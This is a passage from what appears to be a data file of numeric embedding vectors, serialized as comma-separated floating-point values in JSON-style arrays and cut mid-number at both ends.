020286372,0.0031430945,0.028670177,-0.017682226,0.006061033,-0.00032532544,-0.0049416167,-0.0036146764,0.0037594205,-0.0020643617,0.01385652,-0.008414557,0.022582294,-0.018833868,-0.007837051,-0.004494596,-0.0007291472,-0.022595622,-0.028563276,-0.11582111,-0.015137189,0.014931485,-0.0021542124,-0.0058867475,-0.0012565377,0.011311885,0.007130507,0.036225326,0.0019666967,-0.020192705,0.0121524315,-0.019453136,-0.00692003,-0.0046569332,-0.0031708889,-0.020378312,0.009431459,0.0024182366,0.005187141,-0.009257112,-0.023331854,-0.008321162,0.005796475,0.0024431974,0.009614811,-0.0016872237,0.024484813,0.021799438,-0.00058654166,-0.015009387,-0.0045014247,-0.006730011,-0.005904405,-0.03704704,0.014860443,0.012005109,-0.01326235,-0.0020763266,0.010624542,-0.0013320887,0.017600928,0.026962295,0.034583136,-0.0077315746,-0.008323697,-0.016156228,0.008373633,0.0022835974,-0.0021046365,-0.0029750785,-0.014675329,-0.020595333,0.014330408,-0.037023157,-0.017595151,-0.0076517626,0.020927487,0.013750702,0.010442019,-0.00223381,0.02420332,-0.013571594,0.015558967,0.0022550712,0.019505793,-0.024020825,-0.006666182,-0.00022183992,0.017760651,-0.0062454697,0.01934876,-0.0010445168,-0.021844978,0.025357058,-0.000011271163,0.014220417,0.021385541,0.031855743,0.0012963472,0.007136838,-0.010875828,-0.0023049933,0.0022373048,-0.03129353,0.021225575,0.00048704044,-0.006139629,-0.016195264,-0.0068071964,0.016995275,-0.002919368,0.008871156,0.008204125,0.011557074,0.01090827,0.055466574,-0.0062404177,-0.008942209,0.00004528111,-0.015218921,-0.00501353,-0.012219082,0.007305899,-0.030781776,0.017742371,0.0350309,-0.0074437354,0.011985729,-0.0016066604,0.009176115,0.030981958,-0.01298604,-0.0077880174,0.016605245,0.0008658035,-0.0053997594,0.0059095365,-0.005854457,-0.0053692907,0.023795905,-0.005300068,-0.007494168,-0.022079032,0.01121195,-0.013045407,-0.012535325,0.029500706,0.006949069,-0.03254165,0.0009407044,0.011015735,0.017604692,-0.017839018,0.0064846096,0.010190181,-0.023690559,0.0068000644,0.0126649905,0.020018827,0.00331805,-0.008339389,-0.0016262868,-0.000385157,0.0036766394,-0.00283239,-0.010268842,-0.003423517,-0.008456151,0.008852702,0.0015368123,-0.01603538,0.03581286,0.011909978,-0.012492939,-0.002782021,-0.02933787,0.0083444035,-0.0053885807,0.029797457,-0.010468875,0.021709843,0.0064356998,0.004636058,0.0045598005,-0.019040652,0.0016486231,-0.008476331,0.019010369,0.008407093,-0.017077304,-0.0030745692,0.014783476,-0.060563087,0.016866433,0.012690629,0.009553145,0.010110058,0.029468836,0.022347711,-0.018721351,-0.0058724773,-0.0203393,-0.0022306407,0.0082419505,0.01947799,-0.015853522,-0.0085637355,-0.018533278,0.003365652,0.015780756,-0.0033940577,-0.01580935,-0.012991028,0.0031933363,0.0075043985,0.0021095737,0.023379527,0.009662241,0.0069297827,-0.020365946,0.0048342873,-0.0009997624,-0.0018143962,0.0073066447,0.0072643734,0.0015595518,0.032400247,0.009179087,-0.01841612,-0.0138081955,0.014556155,-0.015144738,-0.01630313,0.007124042,0.011619916,0.0047978,-0.022848798,0.0142640285,0.00746206,-0.0069019753,-0.0037939886,0.02293837,0.012106253,-0.012180938,0.018515447,0.022874571,0.031744685,-0.032142077,-0.022175381,0.005043796,0.026560482,-0.025824863,-0.00940891,-0.017419646,-0.0068057966,0.0121489195,0.011206042,0.012585525,0.008686062,0.014120302,0.0025543864,0.01578061,0.022342144,0.013915018,-0.020740295,0.0056448854,-0.0072638993,0.015029043,0.037042454,0.01061516,-0.014628195,-0.004014749,0.0015463659,-0.0031538198,0.012757937,0.015864454,0.014208897,-0.008204698,0.009375901,-0.00998251,-0.006462911,-0.034530215,0.0010420491,0.008383369,0.01233047,-0.0036772352,-0.038369454,-0.005562616,0.003125155,0.020795753,0.007548844,0.012604631,0.029484361,-0.00069809286,-0.008407783,-0.003249576,0.007438458,0.011061065,0.00036640227,-0.018854357,-0.005878246,-0.0023122684,0.014261297,0.00040165542,0.005382969,0.0029079826,0.019935066,-0.020977378,-0.007408256,0.025156355,-0.0060237213,-0.005104561,-0.013663958,-0.010717079,0.0255388,0.017635565,-0.010743031,0.0051935464,0.011889983,0.0076713916,-0.023096973,-0.01524059,-0.021959307,-0.00069039856,-0.013888845,-0.00533271,0.018689347,0.00040844188,-0.0040155943,-0.046423264,0.020300321,-0.0038186815,-0.0032287498,-0.0005096373,-0.0050581945,0.002678994,-0.010300806,-0.041105554,-0.014342271,0.011647997,-0.016225632,0.020066563,-0.00080031867,-0.0024066838,0.004854777,0.013547625,0.04412108,-0.004504607,-0.008889113,0.018176867,0.013394192,0.0028659387,0.0043068603,0.02830077,-0.010922567,0.018467724,0.034579393,-0.021739421,0.004339447,-0.0011435365,0.0049894284,0.009151915,0.0046012443,0.007613016,0.0060669966,-0.012129285,0.014217794,0.020476427,-0.010290402,0.011986469,-0.0063152853,-0.007627105,-0.0055518784,-0.013160812,0.008613249,-0.023216434,0.002214414,0.014369402,-0.0017538926,-0.0058248234,-0.00030534292,-0.02536852,-0.027056862,0.0007472754,-0.01921945,-0.021810038,-0.0005324977,-0.027335655,0.0069852755,-0.010390251,0.015555557,-0.018616844,-0.021933807,-0.011113744,-0.10502473,-0.0018781023,0.029380186,0.0031279374,0.05206485,0.01818081,-0.007877455,0.013648464,-0.007891197,0.016851773,-0.0043336484,-0.0051695216,-0.014334187,0.006153927,0.03437058,-0.00025055395,-0.013411075,0.01482031,-0.008796885,-0.030365936,-0.004738315,0.0019493751,-0.02308313,-0.015975391,0.02746452,0.0022086187,-0.0075490926,-0.013521196,-0.020643365,0.014678152,0.010627737,-0.0064949524,0.012948209,-0.02382953,0.0023116076,0.026732082,0.0011958464,0.02127913,-0.02549062,-0.05059222,0.011697066,0.009302408,0.0041676,-0.0067496365,-0.03355531,0.020085415,-0.018403623,-0.008905436,0.0063299015,0.0016264099,-0.0035079685,0.019833684,-0.008701071,0.029713824,0.0019591446,0.0052989335,-0.011120749,0.0114824,0.030650875,0.00090721314,-0.011394022,0.011479005,0.011870461,-0.011320732,-0.003395829,0.009543338,0.00087767234,0.025413405,-0.004700606,0.021154765,-0.0011147335,-0.038103536,-0.0026051537,-0.011585147,-0.006520301,0.008364732,0.0020514834,0.0042618774,-0.0052917814,0.0010864653,0.041840024,0.0019128134,0.015447462,-0.015294825,-0.002918713,0.013974939,-0.008096688,-0.019594047,0.008546015,0.0014286425,-0.018956177,-0.011036494,0.028306717,-0.0024405504,0.0061814133,0.0045211427,0.011481717,0.01005399,0.0058216145,0.015917474,-0.018611362,0.0055560675,0.0070814583,-0.010630792,0.0009624455,-0.0017226563,0.0004634303,-0.009220437,-0.011539172,-0.015160369,-0.01026879,0.017565548,0.03447999,0.04483093,0.024985397,0.002260769,-0.0110115195,0.01467305,0.015033015,-0.042087078,-0.0151874395,-0.009274213,-0.01879846,0.02809422,0.034973193,-0.00039914358,0.016058251,0.005508953,-0.016819337,0.008606916,-0.012282594,0.026516275,0.017238714,0.007667063,-0.005231847,-0.0051195063,-0.013748573,0.030546539,0.010823164,0.012651767,0.004496216,-0.028984364,-0.0025580502,-0.004465412,-0.030086555,0.029434903,-0.014644921,0.009368918,-0.0070472206,-0.034897085,-0.0070976573,-0.004682386,-0.014308442,0.016870143,-0.0115098525,0.001071667,0.015567656,0.006094693,-0.014278572,0.0037876077,-0.008090989,0.015471093,0.0020151082,-0.0010797001,-0.007985421,0.0029200877,0.0018423557,-0.010003779,-0.000324001,-0.024818234,-0.030623365,-0.0019363653,0.0029302144,0.0005727993,-0.03704368,0.0041053663,0.019573541,0.012968019,-0.005219894,0.0062047597,-0.029984383,-0.004797206,-0.0036201538,-0.02703521,-0.01866153,-0.010875266,-0.005564764,-0.0027130123,0.021365197,0.0035537982,-0.004896544,-0.012999227,-0.0027582827,-0.015058491,0.0050589703,-0.022135949,0.0039936504,-0.011937722,-0.032753866,0.012343209,0.000930013,0.007953529,-0.020992152,0.015648425,0.034948513,0.03433517,-0.009892272,0.020982116,-0.01617595,0.0033776725,-0.016966466,0.0069275014,0.0059281113,0.11484921,0.017032396,-0.004267778,0.0063875583,0.006622119,0.0066159284,0.0030596612,0.0074735167,0.004003223,-0.00014009785,0.025453247,-0.018768769,0.010649411,0.017602038,-0.0008109536,0.028559012,0.011044266,-0.03101678,0.013885718,0.011332913,-0.0052071973,-0.020011965,-0.002166498,-0.036033135,0.0015274328,-0.06974562,0.031565726,0.02077712,0.0025976545,0.027452186,0.005824706,-0.0024965396,0.005649418,0.010860247,-0.013602266,-0.0017421412,0.006872946,-0.00638274,0.0018072627,-0.017801568,0.014381305,-0.007046806,-0.0037408057,-0.014388477,-0.02208305,-0.020222997,0.0043028337,0.0042282394,-0.0010995476,-0.011715179,-0.0037884335,-0.007890672,0.012180817,0.0039029631,0.015395278,-0.0010422836,-0.019225117,-0.0003678308,0.0066710357,-0.019461514,-0.00035503824,-0.00077594083,0.020475538,-0.0083009135,0.012667614,0.026615847,0.0044694305,-0.02215945,0.0013925517,-0.014056691,0.030620838,-0.008636741,-0.009232573,-0.002241899,-0.0011925435,0.028853152,-0.010391828,-0.004318758,0.007841875,-0.013230468,-0.0010709445,-0.012582536,0.0031512731,-0.00465224,0.009670196,0.016532423,-0.017921302,0.025431681,0.0047511687,-0.016131641,-0.01992182,0.020411363,0.01472325,0.021884175,-0.0068827206,-0.009572547,0.012926422,0.002141088,-0.012013377,0.009808036,-0.010506307,-0.01836253,-0.014979144,0.017378462,-0.0031203318,0.010068308,-0.005954753,0.015032561,-0.0013676452,0.012784834,-0.016672544,0.016901847,-0.0010423803,0.012137766,0.003369124,0.035529375,-0.020820376,-0.02503573,0.013771529,-0.032012448,-0.004703556,0.0020595896,0.015342656,0.02985462,-0.0008732065,-0.005883644,-0.0020093338,-0.008072176,0.00328194,-0.0019699787,0.0054179947,-0.026090415,-0.0033692594,0.021012176,0.007532186,-0.008953485,0.032760866,0.0072277123,0.00976737,-0.003218993,-0.008577921,-0.0151849985,0.0016697098,0.00046303947,0.009070388,-0.01828567,0.029732084,-0.006022336,0.002373218,-0.004350182,0.0068823495,0.0017204229,-0.023344167,-0.010829131,0.00049732544,-0.012528405,-0.012578927,0.004807889,-0.016233709,0.005002639,0.012941988,-0.007077129,0.0052175475,-0.05569473,0.008769786,0.028398843,0.008612023,0.0058998405,-0.009186009,0.011173835,-0.00529226,-0.00022231384,0.0048611425,0.0058352826,-0.019897893,0.0237921,-0.0010289678,0.015780838,-0.013270834,-0.005529874,0.0049706795,0.004965715,-0.002921093,-0.015846927,0.017571187,-0.004930342,-0.009686142,-0.007337064,-0.011072123,0.02591172,-0.015112768,0.009638902,-0.001064381,0.003751775,0.005865323,0.010674067,-0.02174882,0.034159493,-0.023771005,-0.024384044,-0.0090128025,0.011074273,0.010401219,-0.021187346,-0.00061647844,-0.011810143,-0.0051575066,-0.019267902,-0.0029571042,-0.009281154,-0.0024815889,0.0036530283,-0.005939324,-0.023078904,-0.01354697,0.011855481,-0.012259972,-0.033765845,-0.029655779,-0.0032330086,-0.011825452,0.009484933,0.0032680829,-0.005149164,0.0041752164,-0.005550446,-0.013149936,0.015617303,0.017758138,-0.03999893,-0.03437242,0.008126144,0.0067690453,-0.01087504,-0.011098388,-0.0046047065,0.0070109917,0.015913995,0.00013872952,0.0053117718,-0.014485782,-0.01200786,0.020610925,0.0039448715,-0.011604104,0.00039058158,-0.025938695,-0.0055226125,0.002156909,0.007911216,-0.037317604,-0.00119594,-0.01599966,-0.025336536,-0.025783405,-0.015891414,-0.01090779,0.009685825,0.0056882347,-0.0029906011,-0.0015168646,0.009561419,-0.009205622,0.029000944,0.000986057,-0.018695721,0.016753843,-0.005111809,-0.0039607324,0.006206218,-0.011441483,0.023468155,-0.010183924,0.024439668,0.0046966164,0.0026308657,-0.000033635508,-0.0042357333,-0.0034506808,-0.006385186,0.015968746,-0.0057944967,-0.0011487252,-0.01394672,0.004195161,0.014985237,0.00081089186,0.023836497,0.053251304,-0.050672714,-0.0117522115,0.032827824,0.01207543,-0.027369594,0.029619614,-0.006545164,-0.03092912,-0.032951675,0.013222267,0.011804636,-0.018465606,-0.04367778,-0.01570263,0.023886977,-0.003571898,0.015548994,0.0010160009,-0.00944529,-0.0074412087,-0.005901397,0.009528179,-0.0005527194,-0.0036819328,-0.0018614593,-0.00951473,-0.012099798,0.011429852,-0.019688364,-0.004536834,0.022461284,0.027011849,-0.015589683,0.0010583285,0.014360614,-0.011605061,0.024083255,-0.011465122,-0.017107453,-0.025535429,-0.011325707,0.0030962648,0.003394371,0.0003700691,-0.021595744,-0.012201876,0.009063785,0.0061271586,0.14223042,-0.010882838,-0.0053903963,0.0152814705,-0.002654422,0.002014881,0.021425847,0.018749598,0.0032930947,-0.013231916,0.011111546,-0.014688366,0.010501995,0.02383825,-0.010794328,-0.008276356,0.010241596,0.13866356,-0.018049864,0.04184807,0.0034971826,-0.015759056,0.011666385,0.007126065,0.01136274,-0.074044436,0.002186976,-0.032254357,-0.008075852,0.0018759546,-0.023066662,0.03364817,-0.0021358938,0.0011154808,0.0060078553,0.008495291,-0.0015107783,-0.00878682,-0.01748227,-0.011651413,0.016134378,-0.0108402455,-0.014912312,0.015078601,-0.006508361,0.0071217013,-0.025672175,-0.0015177312,0.0016663469,0.01315987,0.017752701,-0.019360913,0.011383683,-0.008449883,0.0053254184,0.0165711,0.006375909,-0.008114691,-0.039007027,0.015218953,-0.007896012,0.016761363,0.0036802113,0.029785914,-0.016158404,-0.017054139,-0.017944947,0.008211395,0.010324936,0.01207841,0.013192079,0.020960107,0.0061074663,-0.028768891,0.02762721,0.007633656,-0.008065694,0.0061762384,0.0066303927,-0.0011388937,0.04199221,0.016736906,-0.006174822,0.00936742,0.020346876,0.004601027,0.0019052663,0.008433394,0.009751676,-0.0073378454,0.0060136253,0.004623767,-0.01693892,0.01512252,0.023747116,0.0350586,-0.004184835,0.0056897453,0.028579913,-0.009200377,-0.0011546038,0.030492282,-0.005430234,-0.0049197045,-0.010448644,0.0047293943,-0.0070918403,-0.029839968,-0.005656699,-0.0029879198,0.0076826364,0.013763917,-0.010611438,0.023950195,-0.004064329,-0.009122179,-0.02184917,-0.0031413804,-0.03594427,-0.0119309565,0.0015354115,-0.017091008,0.00015809579,0.012265803,-0.03156604,-0.001233992,0.009445226,0.004812074,-0.00483243,-0.004122932,-0.022580111,-0.005981547,0.0070700594,0.06407834,0.016706781,-0.0035866108,0.012829884,-0.018638132,-0.005238781,0.0054423762,-0.0019744392,0.015929282,0.00813964,-0.00078600756,-0.0053530885,-0.011226819,0.019049842,-0.0013941465],[-0.013504304,-0.002804435,-0.018886877,-0.010435121,0.008962276,-0.027126634,0.010157737,-0.00062801817,-0.007791673,-0.010828453,-0.011710409,0.009487129,0.0007117964,-0.00013139071,-0.021116236,-0.008800647,0.014911874,0.00693937,0.005320345,0.0020767187,0.0074862395,-0.000054759734,0.02894256,-0.0014424472,0.008637284,-0.0031642963,0.005378567,-0.005932431,-0.0004648773,0.008660594,-0.0025862227,0.022245925,0.015128642,0.0024544522,0.00044051517,-0.0051647616,-0.020096472,-0.023162706,0.0064871754,-0.011463508,-0.012218015,0.009810614,-0.022644974,0.03122774,-0.0064212233,-0.004121309,-0.0056696385,0.013579654,-0.015986804,-0.0065274844,0.00532909,-0.0020650583,-0.03566577,0.020066733,-0.012636082,0.013990913,-0.008418019,-0.03146448,0.018305626,-0.0018116701,-0.007070608,0.0012285468,0.0117785195,-0.022970898,0.026175795,-0.009101048,0.0025746494,-0.011647133,0.010956673,-0.016545134,-0.004243546,-0.016021257,-0.0041636056,-0.00957389,0.0077581485,0.0076157553,-0.0018116607,-0.010179306,-0.019947328,0.0090355035,0.0020895847,0.0009642929,-0.010669623,-0.002747725,0.022910677,-0.0070312247,-0.015690679,-0.0065864814,-0.015733588,-0.021563923,0.00019753962,0.008378435,0.015133395,-0.005645235,-0.006223657,-0.0061570434,-0.001940615,-0.01439497,-0.017772295,0.01829972,-0.0020647713,-0.0014871089,-0.035251647,0.015467463,0.016690321,-0.009351083,-0.0030885208,-0.013158526,-0.0073256777,0.0027284825,0.0041770376,0.013164326,0.010669951,0.020306496,-0.0069908607,-0.008372085,0.0082752,0.007297801,-0.009146103,0.019407434,-0.005168842,0.013354841,0.005990789,-0.0049182265,-0.005609327,0.0042465907,-0.018899556,0.017234929,0.0016722808,-0.010104561,0.009697366,0.010714371,0.005426766,-0.0109031275,0.0032700577,-0.0008376031,0.008750849,-0.0019861986,0.010085654,-0.004803172,0.01507522,-0.009162779,0.016597217,0.00804805,0.024205426,0.020281013,-0.006426703,0.034289952,0.01697359,-0.015721766,0.0076353904,-0.011132734,-0.0051132916,-0.017647218,0.0014579348,0.03597516,0.013515294,-0.010394024,-0.024343558,-0.012222274,-0.018455187,0.0014013875,0.012405143,-0.0070138234,-0.01718,-0.043181527,-0.005261468,-0.014995483,-0.019869829,0.0035621,0.017221974,0.031098673,0.017695468,-0.0025361553,0.008549646,0.007507422,0.0058013494,-0.014208925,-0.0054560886,0.0030109042,0.0134073915,0.01362533,-0.0328692,-0.0064699124,-0.00047648873,0.037870433,0.008279212,-0.011283815,-0.008811,-0.00023498772,0.006614696,-0.03662009,0.012021664,0.0020555363,-0.01576236,-0.028524848,-0.0045756088,0.0966777,-0.0063834274,0.0021223058,-0.014965289,0.012718265,-0.0011455123,-0.05052261,0.0010674011,-0.0030300787,-0.004013038,-0.016320342,0.014760161,-0.0061227977,0.02741136,-0.012376219,-0.005131612,0.014875035,0.01578329,-0.056055643,0.02040291,0.025346363,0.0021616414,0.006127264,-0.023334999,0.007595092,-0.004051833,-0.030851077,-0.013778687,-0.00974697,0.0024763367,0.0056612184,0.004773023,0.006364894,0.01909602,0.015503208,-0.02957714,-0.029098768,0.028784031,-0.026606724,-0.00048099092,-0.0152278235,0.010523261,-0.0004995734,-0.023382992,0.0070300745,0.016160397,0.03780389,-0.007084479,0.009894841,0.0109741995,0.027861536,-0.026466344,0.024653804,0.0048621134,-0.0020312567,0.006505473,0.021209598,-0.004922989,-0.01985751,-0.0004982404,-0.01428777,-0.008253636,-0.0032714782,0.02831537,0.039290253,0.0015717238,0.020552156,0.030243788,0.009379212,0.024684139,-0.038482234,-0.0012654265,-0.016672496,-0.02249123,0.0056144134,-0.018366888,-0.013811499,-0.0015020275,-0.0034813038,0.017669773,0.02336579,0.011526626,-0.00415318,0.0002207519,-0.008573495,0.011850526,-0.022824831,-0.014133451,-0.0025248611,-0.0147127025,0.024352983,0.02215543,-0.0074496227,0.0034471455,0.0019435311,0.026569376,0.027064059,-0.01882772,-0.019616634,-0.042957883,0.0067049707,0.012137443,-0.018482208,-0.020759186,-0.010381614,0.038955413,0.0059467237,-0.0007295302,-0.013616297,-0.0010704541,0.039116565,0.0022311949,0.023058716,-0.046834733,0.0027871914,-0.009165104,-0.011653303,0.016517926,0.0140274055,0.0014321614,-0.015243064,-0.01983106,-0.005881391,0.018387727,-0.014036018,0.011857991,-0.034821607,-0.026741073,0.01778842,-0.002370807,-0.0065414654,0.008426832,-0.00053754495,-0.009302572,0.012189615,0.013560641,0.016417459,-0.020934764,0.0097672455,-0.004831063,-0.0023871383,0.008221229,0.010989647,-0.014645988,-0.019370817,0.0015013567,0.021574156,-0.009858922,-0.00802051,-0.014722201,-0.0070286416,0.007398827,-0.00017585776,0.026820255,-0.022629438,-0.005596379,-0.021571599,-0.01954135,0.0055291187,-0.007670102,-0.012336157,0.0049942406,-0.03611843,0.029189438,0.0007444459,-0.0030323165,-0.0026138034,0.080219634,-0.009117811,-0.0002728687,0.004472826,-0.023880862,-0.015296506,0.027021889,0.0070522525,-0.012720589,0.019610217,-0.020325698,-0.018276036,0.006801982,0.018210322,-0.029540136,0.012733206,-0.012681285,-0.0074792984,-0.034345794,-0.0072430125,0.026065873,-0.022850284,0.014203246,0.008806199,0.007351313,0.015378517,0.017927138,0.0052069034,0.00011391952,-0.025394954,0.016740499,0.0077349357,-0.0041866335,0.008846857,-0.026393762,0.014594076,0.03330629,0.0043413267,-0.018596055,-0.015628153,0.008829004,-0.0032796296,-0.007339628,-0.014944261,-0.008657654,0.043612678,-0.007727346,0.0037181708,-0.005154252,0.026093611,0.0033399307,0.018126128,-0.0070176194,0.0037798772,0.0057321563,0.023080172,0.018988224,-0.03173089,0.05851009,0.03134337,0.005109317,0.024673339,0.00021992187,-0.010997796,0.0021770129,0.027211545,-0.019464904,-0.014078153,-0.01245079,0.0017085194,0.008575768,0.011402562,-0.022920972,0.0031246808,0.0025304276,0.00898365,0.007771321,0.00022048903,-0.002241335,0.03449008,-0.005460598,0.005131011,0.0052339374,-0.0102347005,-0.012021019,0.021454345,0.0036438908,0.0054921713,0.020689776,-0.005537084,-0.0064677387,0.01504366,0.002561843,0.009781093,0.034661315,0.0077332295,0.01847329,0.012838192,-0.0071783783,0.017246962,0.010235744,0.0017428057,-0.01519061,0.00020963847,-0.011065558,-0.00298791,0.013978291,-0.0039652907,0.0024003035,0.023492502,-0.01057452,0.004586451,0.0061344416,-0.019447524,-0.003958437,-0.029443093,0.009312671,-0.01408945,-0.018093517,-0.007984906,0.014355029,0.008180418,0.010735371,0.018457884,0.01665951,0.0141706485,0.0004489829,-0.022401357,0.0014454435,0.016633242,0.0067556035,0.035777967,0.011266144,-0.031751495,0.031227967,-0.010119823,-0.018376522,-0.018527273,0.036557402,0.0148000065,0.016876642,0.021768022,0.022373348,-0.002347526,0.008094546,0.016230123,0.028987914,0.0030767457,-0.014471558,-0.0125039015,-0.0014278892,-0.00077841384,0.0043113166,0.0017822726,0.0026441999,0.0030988106,0.032855116,-0.02226692,0.004290015,-0.0085752765,0.022241294,-0.025340538,0.0038331961,0.010561831,-0.010761566,0.027038949,-0.0004200217,0.05822307,-0.029530434,-0.03199479,-0.00048630254,0.014891381,0.0060146605,-0.012100358,0.021582901,-0.024082053,-0.005373896,0.008741321,0.031026766,0.013167721,0.027425231,-0.0148860365,-0.0035651573,0.0012797797,0.016429203,-0.018158825,0.007957694,-0.007819911,0.0041739517,-0.007717459,-0.020494046,0.0006849396,0.015174594,0.044443678,0.0074506504,-0.009745337,-0.02175162,-0.014827748,0.0040670927,0.017519379,0.0057716914,0.017896762,0.009901828,0.008240922,0.005881114,-0.025302073,0.02770733,-0.00038592936,-0.010890529,-0.0050220983,0.0204618,0.036937132,-0.0035819563,0.0019807431,0.0066663898,0.018861618,-0.011959521,0.011064755,0.009475849,0.018874954,0.008644361,-0.019172275,0.011323534,0.00437174,0.0067125433,-0.02402146,0.009729557,-0.027242567,-0.0096723,-0.011345233,-0.013428757,-0.00998391,-0.0011740008,-0.0027100865,-0.009791534,-0.004403357,-0.019890515,0.003602658,0.018007899,-0.008449949,-0.012474083,0.015085675,0.018657524,-0.026268542,0.02453207,0.011441707,-0.008656885,-0.0106831575,0.017003406,-0.005564342,0.005102884,0.008651793,0.003579965,-0.004877473,-0.00092655903,0.0047285073,-0.002454847,0.008500762,-0.016343758,0.021952914,-0.009914831,0.011517856,0.0077007585,-0.011899665,-0.030047,0.003401703,-0.0067786793,-0.022367513,0.006102059,-0.015775628,0.024382766,-0.013025883,-0.011067244,0.019736387,-0.002659114,0.006176117,-0.027651357,0.030264515,-0.0409306,-0.0014320347,0.0031063203,0.014946517,-0.0040352973,0.029007917,0.019445552,-0.0027145613,-0.001185931,-0.0009733467,-0.018825203,0.0053439387,-0.0069283377,-0.006583735,0.006268386,0.0040291618,-0.036960848,-0.0046896925,-0.02310165,-0.046424028,-0.0376662,0.03842324,0.007371091,0.003270272,-0.0038482032,-0.0020373894,-0.012667756,-0.01914947,-0.0046727997,-0.049632758,-0.004387984,0.01617761,-0.017510498,0.01641749,0.036799155,-0.014208837,-0.013900477,-0.021815337,0.003173453,0.0034121012,0.01676581,-0.022228776,-0.0040687253,0.022770863,0.00079891545,-0.001473284,-0.014645457,0.017013833,0.020442424,0.04569897,0.009879396,-0.01000748,-0.021710508,0.020680508,-0.005042104,0.0010622804,0.010498999,0.022254338,0.009101819,0.010619289,0.008589577,0.014915217,-0.0045929505,-0.0188209,0.0017253197,0.024212178,0.035953347,0.024912369,0.008085222,-0.0021816369,0.006355538,0.0070671043,-0.0011661173,-0.0058749313,0.029538646,0.010138142,-0.0042053545,0.0269454,-0.009162596,0.0063398997,-0.023896763,-0.022383304,-0.0037344233,0.030892497,0.038507268,0.01171095,0.012809891,-0.009326629,0.013325237,0.0007048299,-0.016761167,0.0046942416,-0.01977452,-0.02441569,0.003839387,-0.011379308,-0.0028276155,-0.039929833,-0.004541466,0.00933422,0.011240971,-0.009005794,-0.0029915064,-0.0060395836,-0.0010043413,-0.011772296,-0.024694009,-0.014864622,0.004421802,0.018496972,-0.024642756,0.0044141063,0.009431863,0.019419678,0.012366841,0.016254317,-0.017138919,-0.004497962,0.003246041,-0.012714968,0.017717151,0.015163046,0.01983615,0.0024658479,-0.0026867727,-0.004726035,-0.012032447,-0.009625776,-0.0059865774,-0.017465899,0.008335768,0.012446386,0.0032936994,0.0002456253,-0.016989069,-0.01865647,-0.0008749931,-0.03698719,-0.028715586,0.008189528,0.004460635,0.0045634187,0.019887362,-0.023550954,0.010190798,0.032018848,-0.0123706665,0.009997066,-0.025213933,0.01377779,0.03552723,0.02571484,-0.00841145,-0.035980143,-0.012478841,0.009938827,-0.017783837,0.015864864,-0.0022960138,-0.01572919,-0.020394351,-0.03216451,0.004787017,-0.033766236,0.0047012926,-0.0011750971,-0.03533127,0.027062185,-0.022081384,0.011121029,0.011317321,0.012736563,0.0042749434,-0.014999321,0.012417421,-0.027557803,-0.015542914,0.009704874,-0.010839988,0.013087802,0.007795955,-0.034452777,-0.009104538,-0.025351593,-0.0031416183,-0.016429434,0.022310846,-0.005968932,-0.006606444,-0.021499446,0.016006304,-0.022090651,0.030355688,-0.025706224,-0.004150659,0.00033615634,0.0044332026,0.004897001,0.005430676,-0.02907554,0.017133709,0.0061141253,-0.005193486,0.021373287,0.004651666,0.0024335652,-0.009585152,0.0018827243,-0.001771977,-0.0102736335,0.033566184,-0.002624594,0.0054893517,0.020172331,-0.0031704407,0.0061477656,-0.007730201,-0.012180106,-0.01769279,-0.0067253304,0.006037785,-0.017715398,0.011358282,-0.0025631888,0.0044197156,0.0066594305,0.0009379955,0.037927672,-0.0045424597,0.0018663715,0.036252245,0.012040452,-0.02589621,-0.013374109,0.0057880585,0.014592835,-0.0032073022,0.0158024,-0.00081656466,0.010968696,0.03858829,0.0037255073,-0.003140171,0.008664546,-0.010240207,0.00019351875,0.007256753,0.0017515196,-0.02261927,-0.012985455,0.02967037,-0.029684009,-0.017618084,-0.01904475,-0.0132474825,0.006788757,-0.023735497,0.007939453,-0.0010305111,-0.0029705053,0.0111734485,-0.016306838,-0.0007387441,0.0013705349,0.0056321416,-0.0033994997,-0.0016295989,0.018638035,0.013917464,-0.010685589,0.010675681,-0.009306338,-0.01499138,0.016097276,-0.0096072415,0.004555942,0.015731944,-0.009407777,-0.015393001,0.008351301,-0.02886444,0.023349032,0.034988686,-0.025504064,-0.0003833927,-0.016790466,-0.025570584,0.00060680823,0.001035692,-0.030891998,-0.008891699,0.012919936,0.011603928,-0.021763,-0.018235778,-0.0065976474,-0.054006867,0.007884988,-0.00629472,-0.026390705,0.0105457995,0.0018374976,0.015643582,0.019960077,0.03228921,-0.010865731,0.004519899,-0.004720169,0.021498231,0.0066273054,0.0050516534,-0.0073191235,-0.014488435,0.017759042,0.018703518,-0.0013220407,-0.0030720877,-0.009925041,0.00298915,-0.010417951,0.032206595,0.014482441,-0.016188622,-0.008153232,-0.033072647,0.021886995,-0.0038644783,0.031070055,0.014201148,-0.006087745,-0.01792102,-0.015623671,0.007856678,0.004796803,-0.0017290172,0.005820283,-0.0051843436,-0.00710282,0.006942855,0.034268774,-0.022161031,-0.027269362,0.005648414,-0.019231275,0.00380406,-0.0029695828,0.034132242,-0.0017552032,-0.010152513,0.013409166,-0.0044865627,0.038718626,-0.024769224,0.004153784,0.02411868,-0.006135966,0.004975054,-0.0008854651,0.016678987,0.008539034,-0.017698623,-0.0100513995,-0.0049578794,0.032111146,-0.0013507854,-0.0019879679,-0.022722784,-0.019463569,-0.019510096,-0.008110305,-0.029323582,0.008162731,-0.0026529762,-0.012320917,-0.004252938,-0.0077966624,-0.01687012,0.0069865333,-0.018579423,-0.017964792,-0.02923519,-0.01645345,-0.0059225652,0.005826613,-0.002216952,-0.029421022,-0.0003693138,-0.008447804,-0.0074573397,0.00942659,-0.009352643,0.018830309,-0.01704122,-0.0018830161,-0.0050100093,0.001610193,0.041394453,-0.0046693576,-0.012025146,0.04547696,0.01612033,0.0008319164,0.015671883,0.013658194,0.025188865,0.018857082,-0.011375861,0.0133920275,-0.007813449,0.020495588,0.008430227,0.009626599,-0.0012092756,0.02191773,0.027986404,0.04217154,0.0015415234,-0.0035349177,0.0072650546,0.0025555096,0.011330195,-0.015333488,0.011550264,-0.0054219826,-0.014807161,-0.004769221,0.0036792986,0.009776842,0.0043951324,-0.028576203,0.02623612,0.016884426,0.008651878,-0.037146155,-0.0063802525,0.00640865,-0.025142951,-0.011552125,-0.015514756,0.006151641,0.004776937,-0.032187324,-0.0031635514,-0.0021911897,0.007074333,0.014982897,0.001631911,0.011279717,-0.001621988,-0.0012551185,-0.005093418,-0.013165724,0.003048125,-0.010662575,-0.0014549908,0.025729861,-0.025503691,-0.022913383,-0.0017645191,0.012659122,-0.034473866,0.014666105,-0.006455325,-0.0012696852,-0.010196438,-0.015022582,-0.004772099,0.008479122,-0.003642314,0.03209243,0.0041773412,-0.019718818,0.041373122,0.004431622,-0.010258007,-0.001351415,0.002270654,0.04039613,0